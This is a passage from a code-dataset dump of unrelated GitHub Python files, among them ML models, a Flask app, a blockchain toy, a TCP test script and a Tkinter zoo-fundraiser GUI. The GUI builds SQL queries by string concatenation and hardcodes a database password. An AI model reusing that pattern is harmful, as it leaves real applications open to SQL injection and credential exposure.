nn.BatchNorm1d(512),\n nn.LeakyReLU(negative_slope=0.2, inplace=True), # hidden layer\n nn.Conv1d(512, channel, 1, bias=False)\n )\n\n def forward(self, x1, x2, get_feature=False):\n \"\"\"\n Input:\n x1: first views of images\n x2: second views of images\n Output:\n p1, p2, z1, z2: predictors and targets of the network\n See Sec. 3 of https://arxiv.org/abs/2011.10566 for detailed notations\n \"\"\"\n\n # compute features for one view\n z1, ptfeature1, x_z1 = self.encoder(x1, get_feature) # NxC\n z2, ptfeature2, x_z2 = self.encoder(x2, get_feature) # NxC\n p1 = self.predictor(z1) # NxC\n p2 = self.predictor(z2) # NxC\n\n ptfeature1_pred = self.classifier(ptfeature1)\n ptfeature2_pred = self.classifier(ptfeature2)\n\n return p1, p2, z1.detach(), z2.detach(), ptfeature1_pred, ptfeature2_pred, ptfeature1.detach(), ptfeature2.detach(), x_z1, x_z2\n\nclass DenseSimSiam_Region(nn.Module):\n \"\"\"\n Build a SimSiam model.\n \"\"\"\n def __init__(self, args=None):\n \"\"\"\n dim: feature dimension (default: 2048)\n pred_dim: hidden dimension of the predictor (default: 512)\n \"\"\"\n super(DenseSimSiam_Region, self).__init__()\n channel = 256\n self.project = nn.Sequential(\n nn.Conv1d(channel, 512, 1, bias=False),\n nn.BatchNorm1d(512),\n nn.LeakyReLU(negative_slope=0.2, inplace=True), # hidden layer\n nn.Conv1d(512, 256, 1, bias=False),\n nn.BatchNorm1d(256),\n nn.LeakyReLU(negative_slope=0.2, inplace=True), # hidden layer\n nn.Conv1d(256, channel, 1, bias=False),\n nn.BatchNorm1d(channel)\n ) # output layer\n self.predictor_region = nn.Sequential(\n nn.Conv1d(channel, 512, 1, bias=False),\n nn.BatchNorm1d(512),\n nn.LeakyReLU(negative_slope=0.2, inplace=True), # hidden layer\n nn.Conv1d(512, channel, 1, bias=False)\n )\n\n def forward(self, x1, x2, get_feature=False):\n \"\"\"\n Input:\n x1: first views of images\n x2: second views of images\n Output:\n p1, p2, z1, z2: predictors and targets of the network\n See Sec. 3 of https://arxiv.org/abs/2011.10566 for detailed notations\n \"\"\"\n\n # compute features for one view\n\n region1 = self.project(x1) # NxC\n region2 = self.project(x2) # NxC\n\n region1_pred = self.predictor_region(region1)\n region2_pred = self.predictor_region(region2)\n\n return region1_pred, region2_pred, region1.detach(), region2.detach()","repo_name":"caoxin918/ULD-Net-3D-Unsupervised-Learning-by-Dense-Similarity-Learning-with-Equivariant-Crop","sub_path":"modules/ContrastModel.py","file_name":"ContrastModel.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18628950378","text":"from vaderSentiment_fr.vaderSentiment import SentimentIntensityAnalyzer\r\nclass AnalyserSentiment :\r\n def __init__(self) :\r\n self.data=[]\r\n\r\n def analyzeSentiment(self,tab_to_analyse):\r\n annalyser = SentimentIntensityAnalyzer()\r\n for line in tab_to_analyse :\r\n line_score = annalyser.polarity_scores(line)\r\n self.data.append(line_score[\"compound\"])\r\n return self.data\r\n\r\n def analyzeSentiment2(self, tab_to_analyse):\r\n annalyser = SentimentIntensityAnalyzer()\r\n commentaire=[\"Commentaire\"]\r\n line_score = annalyser.polarity_scores(commentaire)\r\n score=line_score[\"compound\"]\r\n return score","repo_name":"natsuDon/projetCitadek","sub_path":"analyser_entiment.py","file_name":"analyser_entiment.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74564597228","text":"from orator.migrations import Migration\n\n# python db.py make:migration create_posts_table --table=posts --create\n\nclass CreatePostsTable(Migration):\n\n def up(self):\n \"\"\"\n Run the migrations.\n \"\"\"\n with self.schema.create('posts') as table:\n table.increments('id')\n table.integer('user_id')\n table.string('title')\n table.text('body')\n table.timestamps()\n table.soft_deletes()\n table.index(['user_id', 'deleted_at'], name='user_posts')\n\n def down(self):\n \"\"\"\n Revert the migrations.\n \"\"\"\n self.schema.drop('posts')\n","repo_name":"asj214/flask_orator","sub_path":"migrations/2020_04_08_215845_create_posts_table.py","file_name":"2020_04_08_215845_create_posts_table.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1614926179","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom flask import Flask,render_template,request\r\nimport sqlite3\r\nimport json\r\n\r\napp=Flask(__name__)\r\n\r\n#连接临时数据库\r\ndata_base = sqlite3.connect('temp.db', check_same_thread=False)\r\nc = data_base.cursor()\r\n\r\n#设置前端模板\r\n@app.route('/')\r\ndef index():\r\n return render_template(\"index.html\")\r\n\r\n\r\n#设置数据来源\r\n@app.route('/data')\r\ndef data():\r\n global tmp_time,c\r\n sql='select * from scores'\r\n c.execute(sql)\r\n arr=[]\r\n for i in c.fetchall():\r\n arr.append([i[0]*1000,i[1]])\r\n return json.dumps(arr)\r\n\r\n#启动服务器并设定端口\r\ndef start():\r\n app.run(host='0.0.0.0',port=9090)\r\n\r\n\r\n\r\n","repo_name":"liangzp/DQLearning-Toolbox","sub_path":"flask_tk.py","file_name":"flask_tk.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"zh","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"33608104993","text":"from rest_framework import serializers\n\nfrom apps.inventories.models import Inventory\n\n\nclass InventorySerializer(serializers.ModelSerializer):\n total_price = serializers.IntegerField(read_only=True)\n branch_name = serializers.CharField(read_only=True)\n\n class Meta:\n model = Inventory\n fields = '__all__'\n read_only_fields = ('id', 'inventory_number')\n","repo_name":"edzen12/min_crm","sub_path":"backend/crm/apps/inventories/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74647765868","text":"#coding=utf-8\n\nimport urllib.request\nimport urllib.parse\n\nclass HttpRequest(object):\n def __init__(self, url):\n self.url = url\n\n def get(self, param):\n params = urllib.parse.urlencode(param)\n url = self.url + '?%s' %params\n with urllib.request.urlopen(url) as response:\n result = response.read().decode('utf-8')\n return result\n\n def post(self, param):\n data = urllib.parse.urlencode(param)\n data = data.encode()\n with urllib.request.urlopen(self.url, data) as response:\n result = response.read().decode('utf-8')\n return result\n\nif __name__ == '__main__':\n request = HttpRequest('https://www.baidu.com/')\n s = request.post('')\n print (s)","repo_name":"cc397845236/Tools","sub_path":"HTTPRequest.py","file_name":"HTTPRequest.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73932410666","text":"from ctypes import alignment\nfrom tkinter import *\nfrom tkinter.messagebox import showerror\nfrom tkinter.ttk import Combobox\nimport mysql.connector\n\n# Create a connection to the database\nmydb = mysql.connector.connect(\n host = \"localhost\",\n user = \"root\",\n password = \"password\",\n database = \"zoodatabase\",\n autocommit = True\n)\n\nmycursor = mydb.cursor(prepared=True)\n\ndef show_fundraiser(event):\n fundraiser = fundraiserSelection.get()\n fundraiserLabel.config(text=\"Fundraiser ID: \" + fundraiser)\n\n mycursor.execute(\"SELECT Theme FROM Fundraiser WHERE FundraiserID = '%s'\"%fundraiser)\n result = str(mycursor.fetchall()[0][0])\n if result == \"None\":\n result = \"N/A\"\n themeLabel.config(text=\"Theme: \" + result)\n\n return\n\n\ndef doneClick():\n for w in fundraisersFrame.winfo_children():\n w.destroy()\n \n set_fundraisers_frame(savedFFrame, managerID, True)\n return\n\ndef deleteClick():\n delValue = fselectBox.get()\n mycursor.execute(\"DELETE FROM Fundraiser WHERE FundraiserID=\" + delValue)\n return\n\ndef delFundraiser():\n # Refresh the page\n for w in fundraisersFrame.winfo_children():\n w.destroy()\n\n # create delete page\n fselectLabel = Label(fundraisersFrame,text=\"Select Fundraiser: \")\n global fselectBox\n delValue = \"\"\n fselectBox = Combobox(fundraisersFrame, width = 30, textvariable = delValue)\n fselectLabel.grid(row=1,column=0,sticky=E,padx=5,pady=10)\n fselectBox.grid(row=1,column=1,sticky=E+W,padx=5,pady=10)\n fselectButton = Button(fundraisersFrame, text=\"Delete\", command=deleteClick)\n fselectButton.grid(row=1,column=2,stick=W)\n\n mycursor.execute(\"SELECT FundraiserID FROM Overlooks WHERE Manager_EID=\"+managerID)\n result = mycursor.fetchall()\n\n fselectBox['values'] = result\n fselectBox['state'] = 'readonly'\n\n doneButton = Button(fundraisersFrame, text=\"Done\", command=doneClick)\n doneButton.grid(row=2, columnspan=3)\n\n return\n\ndef modClick():\n originalFID = modFSelectBox.get()\n newFID = modFidBox.get()\n\n # Keep original values the same if not modified\n if newFID == '':\n newFID = originalFID\n\n newFTheme = modFthemeBox.get()\n if newFTheme == '':\n mycursor.execute(\"SELECT Theme FROM Fundraiser WHERE FundraiserID=\"+originalFID)\n newFTheme = str(mycursor.fetchall()[0][0])\n\n try:\n sql_update_query = \"\"\"UPDATE Fundraiser SET FundraiserID=%s, Theme=%s WHERE FundraiserID=%s\"\"\"\n data_tuple = (newFID,newFTheme,originalFID)\n mycursor.execute(sql_update_query, data_tuple)\n except:\n showerror(title=\"Error\", message=\"Invalid FundraiserID or Theme. Please try again.\")\n return\n\ndef modFundraiser():\n\n for w in fundraisersFrame.winfo_children():\n w.destroy()\n\n fname = StringVar()\n fselectLabel = Label(fundraisersFrame,text=\"Select Fundraiser: \")\n global modFSelectBox\n delValue = \"\"\n modFSelectBox = Combobox(fundraisersFrame, width = 30, textvariable = delValue)\n fselectLabel.grid(row=0,column=0,sticky=E,padx=5,pady=10)\n modFSelectBox.grid(row=0,column=1,sticky=E+W,padx=5,pady=10)\n\n mycursor.execute(\"SELECT FundraiserID FROM Overlooks WHERE Manager_EID=\"+managerID)\n result = mycursor.fetchall()\n\n modFSelectBox['values'] = result\n modFSelectBox['state'] = 'readonly'\n\n fidLabel = Label(fundraisersFrame,text=\"Set FundraiserID: \")\n global modFidBox\n fid = \"\"\n modFidBox = Entry(fundraisersFrame, width = 30, textvariable = fid)\n fidLabel.grid(row=1,column=0,sticky=E,padx=5,pady=10)\n modFidBox.grid(row=1,column=1,sticky=E+W,padx=5,pady=10)\n\n fthemeLabel = Label(fundraisersFrame,text=\"Set Theme: \")\n global modFthemeBox\n ftheme = \"\"\n modFthemeBox = Entry(fundraisersFrame, width = 30, textvariable = ftheme)\n fthemeLabel.grid(row=2,column=0,sticky=E,padx=5,pady=10)\n modFthemeBox.grid(row=2,column=1,sticky=E+W,padx=5,pady=10)\n\n modButton = Button(fundraisersFrame, text=\"Update\", command=modClick)\n modButton.grid(row=3,column=1)\n\n doneButton = Button(fundraisersFrame, text=\"Done\", command=doneClick)\n doneButton.grid(row=4,column=1)\n\n return\n\ndef addClick():\n fid = fidBox.get()\n ftheme = fthemeBox.get()\n try:\n sql_insert_query = \"\"\"INSERT INTO Fundraiser VALUES (%s, %s)\"\"\"\n data_tuple = (fid,ftheme)\n mycursor.execute(sql_insert_query, data_tuple)\n sql_insert_query = \"\"\"INSERT INTO Overlooks VALUES (%s, %s)\"\"\"\n data_tuple = (managerID,fid)\n mycursor.execute(sql_insert_query, data_tuple)\n except:\n showerror(title=\"Error\",message=\"Invalid FundraiserID or Theme. Please try again.\")\n return\n\ndef addFundraiser():\n\n for w in fundraisersFrame.winfo_children():\n w.destroy()\n\n fidLabel = Label(fundraisersFrame,text=\"FundraiserID: \")\n global fidBox\n fid = \"\"\n fidBox = Entry(fundraisersFrame, width = 30, textvariable = fid)\n fidLabel.grid(row=1,column=0,sticky=E,padx=5,pady=10)\n fidBox.grid(row=1,column=1,sticky=E+W,padx=5,pady=10)\n\n fthemeLabel = Label(fundraisersFrame,text=\"Theme: \")\n global fthemeBox\n ftheme = \"\"\n fthemeBox = Entry(fundraisersFrame, width = 30, textvariable = ftheme)\n fthemeLabel.grid(row=2,column=0,sticky=E,padx=5,pady=10)\n fthemeBox.grid(row=2,column=1,sticky=E+W,padx=5,pady=10)\n\n addButton = Button(fundraisersFrame, text=\"Add\", command=addClick)\n addButton.grid(row=3,columnspan=2)\n\n doneButton = Button(fundraisersFrame, text=\"Done\", command=doneClick)\n doneButton.grid(row=4, columnspan=2)\n\n return\n\n\ndef set_fundraisers_frame(sFrame, mID, e):\n global fundraisersFrame\n global savedFFrame\n fundraisersFrame = sFrame\n savedFFrame = sFrame\n\n global managerID\n managerID = str(mID)\n\n global editable\n editable = e\n\n if editable:\n delB = Button(fundraisersFrame,text=\"Delete a Fundraiser\",command=delFundraiser)\n delB.grid(column = 0, row = 0, padx=5, pady=5, sticky=N+W)\n modB = Button(fundraisersFrame,text=\"Modify a Fundraiser\",command=modFundraiser)\n modB.grid(column = 0, row = 1, padx=5, pady=5, sticky=N+W)\n addB = Button(fundraisersFrame,text=\"Add a Fundraiser\",command=addFundraiser)\n addB.grid(column = 0, row = 2, padx=5, pady=5, sticky=N+W)\n\n\n text = Label(fundraisersFrame, text=\"Browse fundraisers\")\n text.grid(column = 1, row = 0, sticky=S, ipadx=300, ipady=20)\n global fundraiserSelection\n currValue = StringVar()\n fundraiserSelection = Combobox(fundraisersFrame, width = 30, textvariable = currValue)\n fundraiserSelection.grid(column = 1, row = 1, padx=300, pady=20, sticky=N+S+E+W)\n\n mycursor.execute(\"SELECT FundraiserID FROM Overlooks WHERE Manager_EID=\"+managerID)\n result = mycursor.fetchall()\n\n fundraiserSelection['values'] = result\n fundraiserSelection['state'] = 'readonly'\n\n fundraiserSelection.bind('<>', show_fundraiser)\n\n # Create text for fundraiser info\n global fundraiserLabel\n global themeLabel\n\n fundraiserLabel = Label(fundraisersFrame, text=\"Fundraiser ID: None selected\")\n fundraiserLabel.grid(column = 1, row = 2, padx=300, pady=20, sticky=S+E+W)\n themeLabel = Label(fundraisersFrame, text=\"Theme: \")\n themeLabel.grid(column = 1, row = 3, padx=300, pady=20, sticky=N+S+E+W)\n","repo_name":"MackenzieBowal/ZooDatabase_Project","sub_path":"gui/fundraisers.py","file_name":"fundraisers.py","file_ext":"py","file_size_in_byte":7324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70352792426","text":"import os\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import GroupKFold, train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nimport torch.optim as optim\nfrom transformers import get_linear_schedule_with_warmup\n\nimport config\nimport dataset\nimport engine\nimport models\nimport utils\n\n\nwarnings.filterwarnings(\"ignore\")\n# For descriptive error messages\nos.environ['CUDA_LAUNCH_BLOCKING'] = \"1\"\n\n\ndef run():\n if not os.path.exists(config.OUT_DIR):\n os.makedirs(config.OUT_DIR)\n\n df = pd.read_csv(f\"{config.ROOT_DIR}/train.csv\")\n\n if config.DEBUG:\n kf = GroupKFold(n_splits=11)\n for fold, (_, valid_index) in enumerate(kf.split(df, df['id'], df['point_of_interest'])):\n if fold == 5: # pick only fold 5 for debug\n df = df.iloc[valid_index].reset_index(drop=True)\n \n for col in [\"name\", \"address\", \"city\", \"state\", \"zip\", \"country\", \"url\", \"phone\", \"categories\"]:\n df[col] = df[col].fillna(\"\")\n\n df[\"fulltext\"] = (\n df[\"name\"] + \" \" + df[\"address\"] + \" \" + df[\"city\"] + \" \" + df[\"state\"] + \" \" + df[\"country\"] + \" \" + df[\"categories\"]\n ).replace(r'\\s+', ' ', regex=True)\n\n # preprocess of string\n df[\"fulltext\"] = df[\"fulltext\"].str.lower() # lowercase\n df[\"fulltext\"] = df[\"fulltext\"].str.replace(r'[^\\w\\s]+', '') # remove punctuation\n\n # Standardization of coordinates.\n # https://datascience.stackexchange.com/questions/13567/ways-to-deal-with-longitude-latitude-feature\n df[\"coord_x\"] = np.cos(df[\"latitude\"]) * np.cos(df[\"longitude\"])\n df[\"coord_y\"] = np.cos(df[\"latitude\"]) * np.sin(df[\"longitude\"])\n df[\"coord_z\"] = np.sin(df[\"latitude\"])\n\n # print(df.shape)\n # print(df.head())\n\n df_train, df_valid = train_test_split(df, random_state=config.seed, shuffle=True, test_size=0.2)\n df_train = df # 訓練にデータ全部使う\n df_valid = df_valid[df_valid.point_of_interest.isin(df_train.point_of_interest.unique())]\n\n config.n_classes = df_train.point_of_interest.nunique()\n print(\"Number of classes\", config.n_classes)\n\n encoder = LabelEncoder()\n df_train['point_of_interest'] = encoder.fit_transform(df_train['point_of_interest'])\n df_valid['point_of_interest'] = encoder.transform(df_valid['point_of_interest'])\n\n utils.set_seed(42)\n\n model = models.FSMultiModalNet(config.model_name)\n model.to(config.device)\n\n train_loader, valid_loader = dataset.prepare_loaders(df_train, df_valid)\n\n optimizer = optim.Adam(model.parameters(), lr=config.lr, weight_decay=config.weight_decay)\n \n scheduler = get_linear_schedule_with_warmup(\n optimizer, \n num_warmup_steps=len(train_loader) * 2, \n num_training_steps=len(train_loader) * config.epochs\n )\n\n model, history = engine.run_training(\n model,\n optimizer,\n scheduler,\n train_loader,\n valid_loader,\n device=config.device,\n num_epochs=config.epochs\n )\n\nif __name__ == '__main__':\n run()\n","repo_name":"heartkilla/mcd-kaggle-fsq","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4228729306","text":"from block import block as Block\r\nfrom blockchain_utils import blockchain_utils\r\nfrom account_model import account_model\r\nfrom proof_of_stake import proof_of_stake\r\n\r\n\r\nclass blockchain():\r\n \r\n def __init__(self):\r\n self.blocks = [Block.genesis()]\r\n self.account_model = account_model()\r\n self.pos = proof_of_stake()\r\n \r\n def add_block(self, block):\r\n self.execute_transactions(block.transactions)\r\n if self.blocks[-1].block_count < block.block_count:\r\n self.blocks.append(block)\r\n \r\n def toJson(self):\r\n data = {}\r\n json_blocks = []\r\n for block in self.blocks:\r\n json_blocks.append(block.toJson())\r\n data[\"blocks\"] = json_blocks\r\n return data\r\n \r\n def block_count_valid(self, block):\r\n if self.blocks[-1].block_count == block.block_count - 1:\r\n return True\r\n else:\r\n return False\r\n \r\n def last_block_hash_valid(self, block):\r\n latest_blockchain_block_hash = blockchain_utils.hash(self.blocks[-1].payload()).hexdigest()\r\n if latest_blockchain_block_hash == block.last_hash:\r\n return True\r\n else:\r\n return False\r\n \r\n def get_covered_transaction_set(self, transactions):\r\n covered_transactions = []\r\n for transaction in transactions:\r\n if self.transaction_covered(transaction):\r\n covered_transactions.append(transaction)\r\n return covered_transactions\r\n \r\n def transaction_covered(self, transaction):\r\n if transaction.type == \"EXCHANGE\" :\r\n return True\r\n sender_balance = self.account_model.get_balance(transaction.sender_public_key)\r\n if sender_balance >= transaction.amount:\r\n return True\r\n else:\r\n return False\r\n \r\n def execute_transactions(self, transactions):\r\n for transaction in transactions:\r\n self.execute_transaction(transaction)\r\n \r\n def execute_transaction(self, transaction):\r\n if transaction.type == \"POST\":\r\n sender = transaction.sender_public_key\r\n receiver = transaction.receiver_public_key\r\n if sender == receiver:\r\n amount = transaction.amount\r\n self.pos.update(sender, 0)\r\n self.account_model.update_balance(sender, -amount)\r\n \r\n def next_forger(self):\r\n last_block_hash = blockchain_utils.hash(self.blocks[-1].payload()).hexdigest()\r\n next_forger = self.pos.forger(last_block_hash)\r\n return next_forger\r\n \r\n def create_block(self, transaction_from_pool, forger_wallet):\r\n covered_transactions = self.get_covered_transaction_set(transaction_from_pool)\r\n self.execute_transactions(covered_transactions)\r\n new_block = forger_wallet.create_block(covered_transactions, blockchain_utils.hash(self.blocks[-1].payload()).hexdigest(), len(self.blocks))\r\n self.blocks.append(new_block)\r\n return new_block\r\n \r\n def transaction_exists(self, transaction):\r\n for block in self.blocks:\r\n for block_transaction in block.transactions:\r\n if transaction.equals(block_transaction):\r\n return True\r\n return False\r\n \r\n def forger_valid(self, block):\r\n forger_public_key = self.pos.forger(block.last_hash)\r\n proposed_block_forger = block.forger\r\n if forger_public_key == proposed_block_forger:\r\n return True\r\n else:\r\n return False\r\n \r\n def transaction_valid(self, transactions):\r\n covered_transactions = self.get_covered_transaction_set(transactions)\r\n if len(covered_transactions) == len(transactions):\r\n return True\r\n return False","repo_name":"derekblasko/blockchain-messenger","sub_path":"blockchain_messenger/blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18941961312","text":"# -*- coding: UTF-8 -*-\n\"\"\"\nFileName: testscript.py\nAuthor: jiaminbit@sina.com\nCreate date: 2017.6.20\ndescription: 测试脚本,将各测试项的函数定义在该文件中\nUpdate date:2017.7.20\nversion 1.0.0\n\"\"\"\n\nimport time\nimport log\nimport zmq\nimport threading\nimport visionscript\nimport globaldata\nfrom tcpclient import *\n\n\nclass TestFunc():\n def __init__(self):\n try:\n self.vision = visionscript.Vision()\n self.done = False\n self.tcp1 = TcpClient()\n self.tcp2 = TcpClient()\n self.tcp1.tcp_connect('172.11.0.55', 4000)\n self.tcp1.tcp_send('tcp1')\n self.main_thread()\n except Exception as e:\n log.loginfo.process_log('testscript1 init:' + str(e))\n\n def __del__(self):\n self.zmq_close()\n\n def run_step(self, step):\n self.done = False\n globaldata.singnal.runsingnal[1].emit([1, 'Start'+step])\n\n def main_thread(self):\n self.recv_thread = threading.Thread(target=self.tcp_recv)\n self.recv_thread.setDaemon(True)\n self.recv_thread.start()\n\n def tcp_recv(self):\n time.sleep(5)\n self.sequence()\n while(True):\n ret = self.tcp1.tcp_recv()\n if(ret!=''):\n self.run_step(ret)\n\n def sequence(self):\n self.run_step('prerun')\n while(self.done==False):\n time.sleep(0.1)\n self.run_step('function1')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function2')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function3')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function4')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function5')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function6')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function7')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function8')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('function9')\n while (self.done == False):\n time.sleep(0.1)\n self.run_step('postrun')\n while (self.done == False):\n time.sleep(0.1)\n\n def zmq_open(self):\n self.con = zmq.Context()\n self.socket = self.con.socket(zmq.REQ)\n # 接收超时2秒,发送超时1秒\n self.socket.RCVTIMEO = 2000\n self.socket.SNDTIMEO = 1000\n try:\n self.socket.connect('tcp://127.0.0.1:5555')\n except Exception as e:\n log.loginfo.process_log(str(e))\n\n def zmq_comm(self, msg):\n try:\n # 发送数据\n snd = self.socket.send_string('Start' + msg)\n # 接收数据\n ret = self.socket.recv_string()\n return ret\n except Exception as e:\n log.loginfo.process_log(str(e))\n return ''\n\n def zmq_close(self):\n self.socket.close()\n\n def prerun(self):\n time.sleep(1)\n ret = [0, 'pretest']\n self.done = True\n return ret\n\n def function1(self):\n self.vision.read_image()\n ret = [0, 0, 0, 'step1']\n self.done = True\n return ret\n\n def function2(self):\n time.sleep(1)\n ret = [0, 'step2']\n self.done = True\n return ret\n\n def function3(self):\n time.sleep(1)\n ret = [0, 'step3']\n self.done = True\n return ret\n\n def function4(self):\n time.sleep(0.1)\n ret = [0, 'step4']\n self.done = True\n return ret\n\n def function5(self):\n time.sleep(1)\n ret = [0, 'step5']\n self.done = True\n return ret\n\n def function6(self):\n time.sleep(0.1)\n ret = [0, 'step6']\n self.done = True\n return ret\n\n def function7(self):\n time.sleep(1)\n ret = [0, 'step7']\n self.done = True\n return ret\n\n def function8(self):\n time.sleep(0.1)\n ret = [0, 'step8']\n self.done = True\n return ret\n\n def function9(self):\n time.sleep(0.1)\n ret = [0, 'step9']\n self.done = True\n return ret\n\n def function10(self):\n time.sleep(0.1)\n ret = [0, 'step10']\n self.done = True\n return ret\n\n def postrun(self):\n time.sleep(0.1)\n ret = [0, 'posttest']\n self.done = True\n return ret","repo_name":"bitjiamin/PlatForm","sub_path":"Scripts/testscript2.py","file_name":"testscript2.py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11618067783","text":"import sys\r\n\r\nN, Q = map(int, input().split())\r\n\r\ntree = [0] * ((N + 1) * 4)\r\n\r\ndef update(start, end, node, value, target):\r\n if target < start or target > end:\r\n return\r\n tree[node] += value\r\n if start == end:\r\n return \r\n mid = (start + end) // 2\r\n update(start, mid, node * 2, value, target)\r\n update(mid + 1, end, node * 2 + 1, value, target)\r\n\r\ndef find(start, end, node, fl, fr):\r\n if fr < start or fl > end:\r\n return 0\r\n if fl <= start and fr >= end:\r\n return tree[node]\r\n mid = (start + end) // 2\r\n return find(start, mid, node * 2, fl, fr) + find(mid + 1, end, node * 2 + 1, fl, fr)\r\n\r\nfor _ in range(Q):\r\n q = list(map(int, sys.stdin.readline().split()))\r\n if q[0] == 1:\r\n update(0, N, 1, q[2], q[1])\r\n else:\r\n print(find(0, N, 1, q[1], q[2]))","repo_name":"KongUm/BOJ","sub_path":"백준/Gold/12837. 가계부 (Hard)/가계부 (Hard).py","file_name":"가계부 (Hard).py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25565661293","text":"from lost_ark import AucParser\n\n\ndef main():\n auc_parser = AucParser(tesseract_cmd=r'I:\\Tesseract-OCR\\tesseract')\n auc_parser.parse_auc_screenshots_folder(\n folder=r'latest screenshots', \n extension=r'jpg', \n output_folder=r'json dumps'\n )\n \n\nif __name__ == '__main__':\n main()\n\n","repo_name":"Ampiduxmoe/price-collector","sub_path":"price_collector.py","file_name":"price_collector.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15041205757","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\n\n\ndef print_zip(x, y):\n for n, m in zip(x, y):\n print(n, m)\n\n\na = np.loadtxt('../data/project4/dane2.txt')\n\nx_all = a[:, [1]]\ny_all = a[:, [0]]\n\nx, x_test, y, y_test = train_test_split(x_all, y_all, test_size=0.5, random_state=3)\n\nc = np.hstack([x, np.ones(x.shape)])\nc3 = np.hstack([np.cbrt(x), np.ones(x.shape)])\n\nv = np.linalg.pinv(c) @ y\nv3 = np.linalg.pinv(c3) @ y\n\ne = sum((y - (v[0] * x + v[1])) ** 2)/len(y)\ne3 = sum((y - (v3[0] * np.cbrt(x) + v3[1])) ** 2)/len(y)\n\ne_test = sum((y_test - (v[0] * x_test + v[1])) ** 2)/len(y_test)\ne3_test = sum((y_test - (v3[0] * np.cbrt(x_test) + v3[1])) ** 2)/len(y_test)\n\nprint('TRAINING SET ERROR:', 'linear -', e, 'cubic root -', e3)\nprint('TESTING SET ERROR:', 'linear -', e_test, 'cubic root -', e3_test)\n\nplt.plot(x, y, 'ro')\nx = sorted(x)\nplt.plot(x, v[0] * x + v[1])\nplt.plot(x, v3[0] * np.cbrt(x) + v3[1])\nplt.show()\n\nplt.plot(x_test, y_test, 'ro')\nx_test = sorted(x_test)\nplt.plot(x_test, v[0] * x_test + v[1])\nplt.plot(x_test, v3[0] * np.cbrt(x_test) + v3[1])\nplt.show()\n","repo_name":"OleksandrBieliakov/miw","sub_path":"project4/myRegression.py","file_name":"myRegression.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43064119521","text":"#!/usr/bin/python\n#coding=utf-8\n'''\n Module:The Bias SVD Algorithm implementation using numpy\n Author: Timmy Qiao\n Date: Jun 11 2019\n The main procedures include:\n\n'''\nimport numpy as np\nimport time\nimport pandas as pd\nimport pickle\n\nclass BiasSVD(object):\n '''\n Implementation of the BiasSVD approach\n '''\n def __init__(self):\n pass\n\n def __init__(self,epochs,lr,K,Lambda,saveModel=False,ckptStep=10):\n '''\n :param epochs: the max training epoches\n :param lr: learning rate\n :param K: the latent vector dimension\n :param Lambda: the regularized coefficient\n '''\n super(BiasSVD, self).__init__()\n self.epochs = epochs\n self.lr = lr\n self.K = K\n self.Lambda = Lambda\n self.usersDict = {}\n self.itemsDict = {}\n self.saveModel = saveModel\n self.ckptStep = ckptStep\n\n def fit(self,trainData,valData=None):\n rateNums = trainData.shape[0]\n train_df = pd.DataFrame(trainData) # convert the narray object to DataFrame object\n userIds = np.array(train_df[0].value_counts().keys())\n itemIds = np.array(train_df[1].value_counts().keys())\n userIds = np.sort(userIds)\n itemIds = np.sort(itemIds)\n for index,id in enumerate(userIds):\n self.usersDict[id] = index\n for index,id in enumerate(itemIds):\n self.itemsDict[id] = index\n\n userNum = len(userIds)\n itemNum = len(itemIds)\n self.meanV = 1.0 * np.sum(trainData[:,2]) / rateNums\n initV = np.sqrt(self.meanV / self.K)\n self.Pu = initV + np.random.uniform(-0.01,0.01,(userNum,self.K))\n self.Qi = initV + np.random.uniform(-0.01,0.01,(itemNum,self.K))\n self.Bu = np.random.rand(userNum) / (self.K ** 0.5)\n self.Bi = np.random.rand(itemNum) / (self.K ** 0.5)\n\n for i in range(self.epochs):\n epochTime = time.time()\n sumRmse = 0.0\n # Using the SGD approach to optimize the loss function\n # We need to permute the training orders of the same training data\n train_permute_indices = np.random.permutation(trainData.shape[0])\n curStep = 0\n for index in train_permute_indices:\n userId = trainData[index][0]\n itemId = trainData[index][1]\n userIndex = self.usersDict[userId]\n itemIndex = 